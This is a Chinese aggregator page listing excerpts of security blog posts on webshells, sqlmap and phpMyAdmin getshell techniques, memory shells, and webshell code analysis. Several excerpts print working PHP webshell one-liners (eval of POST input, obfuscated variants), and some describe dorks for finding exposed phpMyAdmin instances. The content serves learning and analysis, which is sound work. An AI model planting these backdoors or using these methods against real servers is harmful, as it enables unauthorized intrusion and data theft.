ICode9

精准搜索请尝试: 精确搜索
  • sqlmap从入门到精通-第四章-4-2 使用sqlmap直连MySQL获取webshell2020-06-27 21:52:30

    4.3 使用sqlmap直连MySQL获取webshell 在一些场景下,需要通过MySQL直接连接来获取权限,如果通过暴力破解,嗅探等方法获取了账户和密码,而服务器没开放Web服务的情况,那么就得直接通过数据库获取一定的权限了 4.3.1 使用场景 (1) 获取了MySQL数据库账户和密码 (2) 可以访问3306端口及数

  • sqlmap从入门到精通-第四章-4-2 SQL Server获取webshell及提权基础2020-06-25 20:55:51

    4.2 SQL Server获取webshell及提权基础 主要架构ASP+MSSQL+IIS或者ASP.NET+MSSQL+IIS ,PHP和JSP架构也是支持MSSQL 4.2.1 SQL Server简介 4.2.2 SQL Server版本 1. SQL Server 2000 2. SQL Server 2005 3. SQL Server 2008 4. SQL Server 2012 5. SQL Server 2014 6. SQL Server 20

  • JBOSS 无文件webshell的技术研究2020-06-20 13:01:32

    前几篇文章主要研究了tomcat,weblogic的无文件webshell。这篇文章则重点研究jboss的无文件webhsell。下面分享一下思路 以下分析基于 jboss 社区版 wildfly-20.0.0.Final版本 0x01 wildfly 加载Filter分析 在Filter处随便打一个断点,如图,观察堆栈 jboss比较简单,处理Filter的代码如

  • phpmyadmin通过慢查询日志getshell连载(二)2020-06-18 14:04:16

    这是phpmyadmin系列渗透思路的第二篇文章,前面一篇文章阐述了通过全局日志getshell,但是还有一个日志可以getshell,那就是本次实验的慢查询日志,操作类似,毕竟实战中多一条路就多一次成功的机会 1、查看当前慢查询日志目录 show variables like '%slow%';     2、开启慢查询日志

  • 冰蝎改造之适配基于tomcat Filter的无文件webshell2020-06-12 12:07:18

    上一篇文章介绍了Tomcat基于Filter的无文件webshell的demo。Filter的webshell很简单,只是实现了一个简单的命令执行。查找了网上的公开的webshell,发现基于Filter并且功能比较齐全的webshell基本没有。所以萌生了自己魔改冰蝎以适配tomcat内存马的想法。 0x00 反编译冰蝎 创建一个m

  • webshell2020-05-30 23:02:28

    Webshell是黑客经常使用的一种恶意脚本,其目的是获得对服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。黑客通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终

  • 简单的网络数据分析溯源(上传WebShell的IP地址)2020-04-08 13:55:09

    实验背景: 某公司安全工程师抓取到一段Wireshark数据包,发现有人成功上传了WebShell,请找到上传者的IP地址。 面对一段数据包首先要学会wireshark的过滤规则,其次得知道自己需要查找目标得特征 目标:查找连接webshell的IP地址 思路:找到webshell从而确定IP,webshell不变形的话由以下的

  • 内网渗透代理——reGeorg 利用 webshell 建立一个 socks 代理进行内网穿透,本质上就是在webshell上做了一个代理转发而已2020-03-17 09:55:21

    内网渗透之端口转发、映射、代理 裁决 / 2019-09-18 09:22:14 / 浏览数 13714 渗透测试 渗透测试顶(7) 踩(0)   端口转发&端口映射 0x01 什么是端口转发 端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH)为网络安全通信使用的一种方法。端口转发是转发一个网络端口

  • 铁三知识点复习 webshell2020-03-15 20:03:40

    铁三知识点复习 webshell 什么是webshell? webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访

  • 攻防世界 web webshell2020-03-01 13:38:25

    做题两分钟,工具两小时 题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 所谓的php一句话:<?php @eval($_POST['shell']);?> 这个是PHP最常见的一句话木马的源码,通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算 这题又涉及到

  • CTF--HTTP服务--路径遍历(拿到www-data用户权限)2020-02-05 17:03:40

    开门见山     1. 扫描靶机ip,发现PCS 172.18.4.20       2. 用nmap扫描靶机开放服务及版本       3. 再扫描靶机的全部信息           4. 用nikto工具探测http服务敏感信息           5. 用dirb工具探测http服务敏感信息       6. 打开敏感页面进行查看

  • 分析PHP的webshell代码2020-02-03 18:51:45

    发现一个框架漏洞,可以大量getshell,在网上下载的webshell发现有后门,最后在github上有很多web但是又没说明密码    https://github.com/tennc/webshell/blob/master/php/5678.php 就准备开始解析这段代码 1 <?php 2 $info='7P3ZcuPMsiUIv0pb2b/N6r9pwyDqfLK2ukgkAVJQAhSGCBC4IwF

  • phpmyadmin渗透拿webshell2020-01-31 18:06:47

    首先我们用诸如下图的谷歌语法比如:inurl:index.php intitle:phpMyAdmin 以及shoudan,钟馗之眼等可以再网上搜到一大批暴露的phpmyadmin,看到个文章讲的比较详细https://blog.csdn.net/weixin_44023460/article/details/84925950 我们可以尝试弱口令爆破 ,爆破工具:http://ximcx

  • webshell多功能检测【超越菜刀】2020-01-21 11:52:28

    webshell多功能检测【超越菜刀】, 功能1:多线程检测webshell存活,以及可写的目录权限。 功能2:多线程检测webshell的根目录权限。 功能3:多线程检测webshell的首页修改权限。 功能4:多线程检测webshell是否被劫持。 功能5:多线程检测webshell的百度收录。 功能6:可批量导出,可写权限,根目录

  • 1_文件上传漏洞原理2020-01-16 23:03:51

    0x00 文件上传 File Upload 文件上传是大部分Web应用具有的功能,例如:头像上传,分享图片,视频,上传附件等等 正常的文件一般是图片,视频,文档等,web应用收集后放到后台存储,等到调用的时候调用返回。 如何恶意文件PHP,asp等绕过web应用后直接执行,则相当于黑客直接拿到了webshell 一旦黑客拿

  • 代码注入/文件包含 弹出Meterpreter2019-12-16 09:02:13

    主要通过 msf 中 exploit 的 web_delivery 模块来实现此功能 0x01 前提背景 目标设备存在远程文件包含漏洞或者命令注入漏洞,想在目标设备上加载webshell,但不想在目标设备硬盘上留下任何webshell文件信息 解决思路:让目标设备从远端服务器加载webshell代码至内存执行 0x02 实现方法

  • WINDOWS服务器IIS解析漏洞维护办法,防止WEBSHELL入侵!2019-12-14 09:03:55

    本站服务器经过更换2012版后 网站经常被人拿WEBSHELL篡改文件! 找了半天也找不到漏洞在哪好在微信好友Carry的帮忙下找出了漏洞,并给出了以下的修改方案我是根据方案3修复的,在这里给大家分享下 一、漏洞介绍漏洞影响 IIS7 及IIS7.5 在使FastCGI方式调用php时,在php.ini里设置cgi.fix_

  • 冰蝎动态二进制加密WebShell基于流量侧检测方案2019-12-08 09:03:40

    概述 冰蝎是一款新型动态二进制加密网站工具。目前已经有6个版本。对于webshell的网络流量侧检测,主要有三个思路。一:webshell上传过程中文件还原进行样本分析,检测静态文件是否报毒。二:webshell上线或建立连接过程的数据通信流量。三:webshell已连接后执行远程控制命令过程的数据通

  • WebShell代码分析溯源(十一)2019-11-03 14:01:40

    WebShell代码分析溯源(十一) 一、一句话变形马样本 <?php $e = $_REQUEST['e'];declare(ticks=1);register_tick_function ($e, $_REQUEST['GET']);?> 二、代码分析 1、调整代码格式    2、分析代码 2.1、首先使用REQUEST方法接收url中e参数传递的值, 然后执行declare函数和regi

  • WebShell代码分析溯源(七)2019-11-02 10:03:07

    WebShell代码分析溯源(七) 一、一句话变形马样本 <?php $e = $_REQUEST['e'];$arr = array($_POST['POST'],);array_map(base64_decode($e), $arr);?> 二、代码分析 1、调整代码格式    2、分析代码 分析代码,首先使用REQUEST方法接收url中e参数传递的值,然后创建arr数组并把$_PO

  • WebShell代码分析溯源(四)2019-10-31 12:50:32

    WebShell代码分析溯源(四) 一、一句话变形马样本 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`

  • WebShell代码分析溯源(三)2019-10-30 14:02:25

    WebShell代码分析溯源(三) 一、一句话变形马样本 <?php $g = array('','s');$gg = a.$g[1].ser.chr('116');@$gg($_POST[get]);?> 二、代码分析 1、调整代码格式    2、分析代码 分析代码,首先创建一个g数组,然后拼接字符串,把拼接之后的字符串赋值给gg变量,字符串拼接的过程:$g[1]

  • PHP-WebShell-Bypass-WAF2019-10-20 09:03:04

    PHP-WebShell-Bypass-WAF PHP WebShell 一句话的结构是:输入和执行,这是经典的PHP 一句话代码: <?php eval($_GET['test']); ?> <?php eval($_POST['test']); ?> WebShell 的输入点在$_GET 和$_POST ,执行点在eval() ,经典的一句话WAF 都会拦截 测试:<?php eval($_GET

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有